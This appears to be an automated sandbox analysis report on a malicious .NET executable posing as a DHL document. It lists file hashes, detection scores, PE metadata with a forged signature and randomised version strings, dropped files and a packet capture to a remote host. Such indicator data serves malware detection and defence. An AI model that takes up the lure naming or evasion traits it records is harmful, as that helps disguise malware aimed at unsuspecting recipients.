SHA-256:	5B60EEF7B62C70F68311F80199578144694445D28286C7C87E7F79ACE2875580
SHA-512:	D1EBD18AE3015614F342D5513BA672EEA9AFE414FE7B20B829B0FDB9E3522095EAEC8DF6DC15EDD9E06E911D116EF607B4DEE1A2AA2E402DFDBBC5F0A2FAE029
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.............^.... ........@.. .......................@.......O....@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H........D..T..............................................................(......(....~s ........s!........s.........Bs....o....o"...*..0..........r...prt..p~....o....r~..pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....r...pr...p~....o....r&..pr>..p~....o....~....o....rH..prd..p~....o....rn..pr...p~....o....~....o....~....o....~....o.....s......%r...pr...p~....o....r...pr...p~....o....~....o....r...pr5..p~....o....r?..prW..p~....o...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1558737103548054
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rgifWFwZk9+MlWlLehB4yAq7ejCxifW41:OaqdmuF3r3fU3+kWReH4yJ7M/fD1
MD5:	CBFBD848F9B7C0C1A3D11FC1B9970537
SHA1:	6C3FA6A7C07588D13892375E065DA47601A115CB
SHA-256:	2A9C00CD9A7079247C7BE6A6938A7E62E78C91401E9CA551CA45D3F6F5D18849
SHA-512:	C74BBE822D5CCF38DBAAC21C4CBEC20655C68B869D96FD42E6030DDDD0DE86441C450D40EE83D72C91FB86A0BDBE80F6BFCAE9EEF19943F0B6D11282DDD14087
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. F.e.b. .. 2.5. .. 2.0.2.1. .1.1.:.0.5.:.3.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. F.e.b. .. 2.5. .. 2.0.2.1. .1.1.:.0.5.:.3.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.689809082227129
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_document1102202068090891.exe
File size:	61312
MD5:	5e86ec60bc329db96be8d476537a554c
SHA1:	2881b03bd6a77dc83774e29a93746b52dbb5f568
SHA256:	5b60eef7b62c70f68311f80199578144694445d28286c7c87e7f79ace2875580
SHA512:	d1ebd18ae3015614f342d5513ba672eea9afe414fe7b20b829b0fdb9e3522095eaec8df6dc15edd9e06e911d116ef607b4dee1a2aa2e402dfdbbc5f0a2fae029
SSDEEP:	768:942TTm1gTCbgfWalSZXHIWSjSjSjSjSjSjSGAo+UHHyh:dm1gTvfWtZXoWSjSjSjSjSjSjSGA3GH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.............^.... ........@.. .......................@.......O....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40f05e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=GmCfPFHDcuzlTjhxMdnVRJoRVgxTEsDs, S=EgqFIbFXqDyHDVRtCmJuGmDXJ, L=UhbplJmbRIqnYOVNHBPRClNvdHLCuEflyshok, T=hLhfQrYATPJmebJIjYfLhyuTgcvlTsZSKToEBnDqCsjuO, E=WxJuQdabkKtXhbEWRMIkwRvZMGeUpdlZdaZiLXuIsMY, OU=XQlvRxXJVGurkLsNjRemSVsFyTI, O=eQgmBDSwTXLOkJaQmGCQURXkrjXuCkbneQT, CN=sPaHNKCWgouQBALRgLkQHaPXNWyWuptDTrjCUMjaPuVZ
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	2/24/2021 5:01:32 PM 2/24/2022 5:01:32 PM
Subject Chain	C=GmCfPFHDcuzlTjhxMdnVRJoRVgxTEsDs, S=EgqFIbFXqDyHDVRtCmJuGmDXJ, L=UhbplJmbRIqnYOVNHBPRClNvdHLCuEflyshok, T=hLhfQrYATPJmebJIjYfLhyuTgcvlTsZSKToEBnDqCsjuO, E=WxJuQdabkKtXhbEWRMIkwRvZMGeUpdlZdaZiLXuIsMY, OU=XQlvRxXJVGurkLsNjRemSVsFyTI, O=eQgmBDSwTXLOkJaQmGCQURXkrjXuCkbneQT, CN=sPaHNKCWgouQBALRgLkQHaPXNWyWuptDTrjCUMjaPuVZ
Version:	3
Thumbprint MD5:	4E602070677B0AC732C9F963C0C6C1BD
Thumbprint SHA-1:	A1B01DA66D0C3FBA003146324168815F7ED7B0BC
Thumbprint SHA-256:	46DA2F5B57E2DB105147FB6AE1272AA1A3B9675F3114FFDD8C6EEA1895416B3A
Serial:	00ED36AC39A8045EC2E16DBBD9A6DA3C46

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf010	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x3e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xda00	0x1580	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd064	0xd200	False	0.210193452381	data	4.27631031527	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x3e0	0x400	False	0.46484375	data	3.53334443523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x10058	0x388	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Copyright 2022 QInfaBsH. All rights reserved.
Assembly Version	5.7.8.4
InternalName	GecvcAeU.exe
FileVersion	3.7.5.4
CompanyName	OlNhAoQx
LegalTrademarks	UxqlfIbn
Comments	VbDQUczX
ProductName	GecvcAeU
ProductVersion	5.7.8.4
FileDescription	NIAbCPuf
OriginalFilename	GecvcAeU.exe
Translation	0x0409 0x0514

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 11:04:07.005327940 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.067523003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.069052935 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.070266962 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.133971930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162595987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162636995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162662983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162688017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162710905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162734032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162761927 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.162796974 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.162798882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162825108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162847042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162863970 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.162868977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.162916899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.164226055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.164264917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.164315939 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.165750980 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.165781975 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.165848970 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.167238951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.167272091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.167336941 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.168759108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.168793917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.168900967 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.170290947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.170325041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.170427084 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.171825886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.171855927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.172027111 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.173448086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.173476934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.173551083 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.174873114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.174915075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.175362110 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.176398039 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.176429987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.176500082 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.177921057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.177953959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.178299904 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.224905014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.224950075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.225081921 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.225579977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.225608110 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.225701094 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.227134943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.227166891 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.227252960 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.228637934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.228672028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.228755951 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.232090950 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.232127905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.232152939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.232273102 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.232434988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.232460022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.232511044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.234016895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.234055042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.234137058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.235534906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.235568047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.235636950 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.237054110 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.237087011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.237138033 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.238579988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.238612890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.238672018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.240075111 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.240108967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.240168095 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.241611958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.241643906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.241707087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.243125916 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.243160009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.243225098 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.244690895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.244730949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.244828939 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.246179104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.246211052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.246260881 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.247716904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.248449087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.248481989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.248640060 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.248986006 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.249978065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.250013113 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.250081062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.251517057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.251553059 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.251619101 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.253057957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.253102064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.253185987 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.254594088 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.255073071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.255153894 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.257080078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.257116079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.257199049 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.257771015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.257797956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.257922888 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.259162903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.259198904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.259282112 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.287451029 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.287491083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.287545919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.288110018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.288139105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.288224936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.289604902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.289634943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.289705038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.291017056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.294559002 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.294599056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.294656992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.295233965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.295263052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.295284986 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.296613932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.296644926 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.296663046 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.298059940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.298094034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.298130989 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.299398899 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.299433947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.299459934 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.300859928 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.300893068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.300945044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.302234888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.302274942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.302320957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.303699970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.303764105 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.303805113 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.305071115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.305109024 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.305157900 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.306555986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.306591034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.306637049 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.307904959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.307940006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.307976961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.309305906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.309371948 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.311069012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.311101913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.311184883 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.311738968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.311763048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.311815977 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.313195944 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.313230038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.313281059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.314683914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.314727068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.314779043 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.315956116 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.315992117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.316060066 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.317270994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.317307949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.317358971 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.319809914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.319866896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.319933891 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.320914984 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.320955038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.321006060 CET	49716	80	192.168.2.5	172.67.172.17
